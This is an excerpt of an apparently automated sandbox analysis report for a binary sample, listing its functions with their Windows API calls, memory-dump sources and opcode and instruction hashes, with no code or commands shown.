                                    • Opcode Fuzzy Hash: 7d9ec2ce86bd336f40c2330c90b722bcb9764cd371d2573c769c360cd63deecf
                                    • Instruction Fuzzy Hash: FB21B372E10118ABDB20EFA9CC95AEFBBB8FB44754F154166E909F7144EA30D904CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086E44C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0086E458
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 0086E523
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 0086E543
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 0086E54D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    • Opcode ID: 02421114344fade33ba778d6bfe694547f1180260e27394e5c4a6a30db4eeb4f
                                    • Instruction ID: fdbeea0b0fdb2bf473c7a507499e3cd013e089cf06fea3ea86385c21055f05e8
                                    • Opcode Fuzzy Hash: 02421114344fade33ba778d6bfe694547f1180260e27394e5c4a6a30db4eeb4f
                                    • Instruction Fuzzy Hash: 05311875D152199BDF21EFA4D989BCDBBB8FF08304F1041AAE40DAB250EB709B848F45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087337D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00873475
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0087347F
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0087348C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 55b9c7fad22e2fb2444a6291e48d486200f43171340bf31e742d8d5ec4a3a114
                                    • Instruction ID: 729cc9f61a8f995f9a1a6ea044d829d92e5c9d9082ec288b7644c50fec8da44f
                                    • Opcode Fuzzy Hash: 55b9c7fad22e2fb2444a6291e48d486200f43171340bf31e742d8d5ec4a3a114
                                    • Instruction Fuzzy Hash: 0231B37491121C9BCB21DF68DC89B9DBBB8FF18310F5085DAE41CA7260E7709B859F49
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081433F Relevance: 4.5, APIs: 3, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$LoadLockSizeof
                                    • String ID:
                                    • API String ID: 2853612939-0
                                    • Opcode ID: bc76afd59d2fa76da56b7e3fa2510d3d11d9a381b1932447f80530889480bf45
                                    • Instruction ID: b892adcc75babb2ab6725c8a0ac319ca9cc8eec3e679842587ab74716437c3a2
                                    • Opcode Fuzzy Hash: bc76afd59d2fa76da56b7e3fa2510d3d11d9a381b1932447f80530889480bf45
                                    • Instruction Fuzzy Hash: 45F0F6B3904225978B311B59DC48CABB7ACFF84716309292AFC65D7394EA70DCC081A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087A340 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
                                    • Instruction ID: bb3d0497de7a6eeee43aaa63c6b2a9105246457bc01676f7d207bf5309dd93ff
                                    • Opcode Fuzzy Hash: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
                                    • Instruction Fuzzy Hash: C6F12C71E012199FDF18CFA8C8806AEBBB1FF88314F258269D919E7345D731ED418B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086D58A Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoEx.KERNEL32(?,?,0086D265,?,00000022,00000000,00000002,?,?,00862908,00000004,0085CD4E,?,00000004,0085E352,00000000), ref: 0086D5AC
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,?,?,?,0086D265,?,00000022,00000000,00000002,?,?,00862908,00000004,0085CD4E), ref: 0086D5B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 74a0f100a678d1254ef72c3e24fda30cfab14e9a1b663fc2584a9eb7e878de3f
                                    • Instruction ID: 15608bcd036598ddd868921b9dadd7bb6ce68ca69c31f06a67323df7ad368e83
                                    • Opcode Fuzzy Hash: 74a0f100a678d1254ef72c3e24fda30cfab14e9a1b663fc2584a9eb7e878de3f
                                    • Instruction Fuzzy Hash: 28E0EC32A0522CABCF026F95EC188AE7F2AFF047657094017FD0697520DB329A609BD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008339FA Relevance: 3.0, APIs: 2, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,?,00000000), ref: 00833A09
                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00833A17
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: b5fa33142b28256f8b3d33416511267e66161b8b066d4e2a5cbffb8d40abc91a
                                    • Instruction ID: 1dbf548b20db90514b5f68749804eb779c86c178455e2ac87c648c900876f3f4
                                    • Opcode Fuzzy Hash: b5fa33142b28256f8b3d33416511267e66161b8b066d4e2a5cbffb8d40abc91a
                                    • Instruction Fuzzy Hash: 08D0C931298708BBE6006B849C06FB6776CF708B42F044001BB08890D0C6B068108661
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008853C4 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008853BF,?,?,00000008,?,?,0088EF09,00000000), ref: 008855F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: b37afe0e2cf25911078169520bd5975fa0031810494b3a9b9e99a30f3adf791e
                                    • Instruction ID: 45799f5349b1f79ed45bb127a2c4204f548a41a78d9bf28af5d67657835614bf
                                    • Opcode Fuzzy Hash: b37afe0e2cf25911078169520bd5975fa0031810494b3a9b9e99a30f3adf791e
                                    • Instruction Fuzzy Hash: 8AB18D71210A08CFDB15DF2CC48AB657BE1FF45365F698658E89ACF2A1C335E982CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086E678 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0086E68E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-0
                                    • Opcode ID: 25fd2943041d6e62a3c379612735a751ed547aebfa8fd455c6d987a0aa846aa5
                                    • Instruction ID: 8c44580c9d998727e03eedd10df7960086e46ef74d505d1c2117756d44c2db54
                                    • Opcode Fuzzy Hash: 25fd2943041d6e62a3c379612735a751ed547aebfa8fd455c6d987a0aa846aa5
                                    • Instruction Fuzzy Hash: FA5179B5E01615CBEB19CF99D8917AEBBF0FB48310F29866AD805EB350E3749905CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088B1C4 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0088049B: GetLastError.KERNEL32(?,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 008804A0
                                      • Part of subcall function 0088049B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 0088053E
                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0088AF61,00000000,00000000,?), ref: 0088B1F0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$InfoLocale
                                    • String ID:
                                    • API String ID: 3736152602-0
                                    • Opcode ID: 156557027604c70a794a23ed2e4ab328716667a97ab6e2e5b6f939b6a62eb94e
                                    • Instruction ID: ebf351724188c14281cd036073f4adc9ca994984fc7ba2881147a78e889305bb
                                    • Opcode Fuzzy Hash: 156557027604c70a794a23ed2e4ab328716667a97ab6e2e5b6f939b6a62eb94e
                                    • Instruction Fuzzy Hash: 59F0F936A10112ABDB287AA49805ABEB754FB80358F140425EC16E3180DB30FE41C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087F7EF Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0087703F: EnterCriticalSection.KERNEL32(?,?,00887562,?,008B03C8,0000000C), ref: 0087704E
                                    • EnumSystemLocalesW.KERNEL32(0087F7E2,00000001,008B01A0,0000000C,0087FC0D,00000000), ref: 0087F827
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                    • String ID:
                                    • API String ID: 1272433827-0
                                    • Opcode ID: 629bd53d682997ec9613d3302bd9f44d9a51f574f983214e59503ee8a4f97383
                                    • Instruction ID: af671d912de52e2f421985dbd30e8a9a9ac50d802aa007f6e9b58a0336e05360
                                    • Opcode Fuzzy Hash: 629bd53d682997ec9613d3302bd9f44d9a51f574f983214e59503ee8a4f97383
                                    • Instruction Fuzzy Hash: 4CF03772A04200DFDB04EF98E842B9977E0FB08721F20812AF525DB2A2CA79A900CF55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088ABD4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0088049B: GetLastError.KERNEL32(?,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 008804A0
                                      • Part of subcall function 0088049B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 0088053E
                                    • EnumSystemLocalesW.KERNEL32(0088AB2D,00000001,00000000,?,?,0088B395,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0088AC0B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem
                                    • String ID:
                                    • API String ID: 2417226690-0
                                    • Opcode ID: 1c198ca64b0892fbd60ad72169f8cc3c5a73d4288e3de1beb8f9ba3b12e390e7
                                    • Instruction ID: 2f18b349087517928f084db1e0eaa0fc0f46b091789df8c978cf72acc48820d2
                                    • Opcode Fuzzy Hash: 1c198ca64b0892fbd60ad72169f8cc3c5a73d4288e3de1beb8f9ba3b12e390e7
                                    • Instruction Fuzzy Hash: B2F0E53630020557DB18BF39D85566ABF95FFC1724B0A405AFA06CB290C6759843CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087493E Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
                                    • Instruction ID: 1229964c7641cb52ef8d8c68283a98b164a66615747efb2bc0c5dbd7f539a80e
                                    • Opcode Fuzzy Hash: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
                                    • Instruction Fuzzy Hash: F551AA302446589BDB38896C84D57BFEB9DFB52304F18F029E54FC72AED711DD44824A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00814455 Relevance: 1.3, APIs: 1, Instructions: 51memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • GetProcessHeap.KERNEL32(?,00000000,0082DD2B,80070216,?,?,?,?,00000000,?,?,?,00814770,?,00000003,00000000), ref: 00814481
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                    • String ID:
                                    • API String ID: 325507722-0
                                    • Opcode ID: 723db26b3dab91f3b34c032fe946e4b478ec73fee9d5914bf72e43ea9a51eeaa
                                    • Instruction ID: 13bea0ce3b8bb2116f48a911cfdb10f568fbca385d68c644c79011b1b971a43a
                                    • Opcode Fuzzy Hash: 723db26b3dab91f3b34c032fe946e4b478ec73fee9d5914bf72e43ea9a51eeaa
                                    • Instruction Fuzzy Hash: 0C119E72604B40DBC711EB68FD46B8937A5FB41732F26121AE124C72A2CBB4A449CB19
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00818547 Relevance: .7, Instructions: 690COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
                                    • Instruction ID: d5540e13f364176ea3ace76537a347fce5ca03b33e422cd238341ece15a5ea3f
                                    • Opcode Fuzzy Hash: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
                                    • Instruction Fuzzy Hash: 7F2281B7F515144BDB0CCA5DCCA23ECB2E3AFD4218B0E813DA90AE3745EA7DD9158684
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087C6F6 Relevance: .7, Instructions: 668COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 6c042132dc3e5e8b17570ae2833f322b467420792aed2535eb5704dae7e1854c
                                    • Instruction ID: 3eeb8abc197d396bd09beebc8228f6e9aae9923b52b42636548c7cd4ba90b5b1
                                    • Opcode Fuzzy Hash: 6c042132dc3e5e8b17570ae2833f322b467420792aed2535eb5704dae7e1854c
                                    • Instruction Fuzzy Hash: 8C327C74A0021A9FCF28CF98C991ABEBBB5FF45304F14816CD949E7359D631EA46CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00886129 Relevance: .6, Instructions: 637COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be7d29dd9063ea3d898b5f40d34bd610af6bf21200810546be9f68dc1ea48345
                                    • Instruction ID: eff7e6e8df945e9e6732da84a34231815ba6913da47e1eeff177ed3ecf64b336
                                    • Opcode Fuzzy Hash: be7d29dd9063ea3d898b5f40d34bd610af6bf21200810546be9f68dc1ea48345
                                    • Instruction Fuzzy Hash: 8D32F321D29F414DD723A634D822335A649FFB73D9F15D737F81AB5AAAEB28C4934200
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00839082 Relevance: .5, Instructions: 459COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
                                    • Instruction ID: 065b27ab54b4c4df6d455117ddad2399f159e8e4ef69ba7d1fc1114a9cb9d90f
                                    • Opcode Fuzzy Hash: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
                                    • Instruction Fuzzy Hash: F9026B71A042199FCB15DF68C491AADB7B2FFC8314F148069E856EB351EB71ED41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088A3E3 Relevance: .3, Instructions: 327COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                    • String ID:
                                    • API String ID: 4283097504-0
                                    • Opcode ID: 251b7c53dc4858bb08e4252e758bbef380342836a0c8749fd096bbb9cb26d5db
                                    • Instruction ID: f61013799f8a801df714af224b98ff06dd69295bf7746359d40b42bf2d7aeb37
                                    • Opcode Fuzzy Hash: 251b7c53dc4858bb08e4252e758bbef380342836a0c8749fd096bbb9cb26d5db
                                    • Instruction Fuzzy Hash: 3BB1F7355007058BEB38FB28CC91AB7B3A8FF50308F44452EE946C6585E674E985CB12
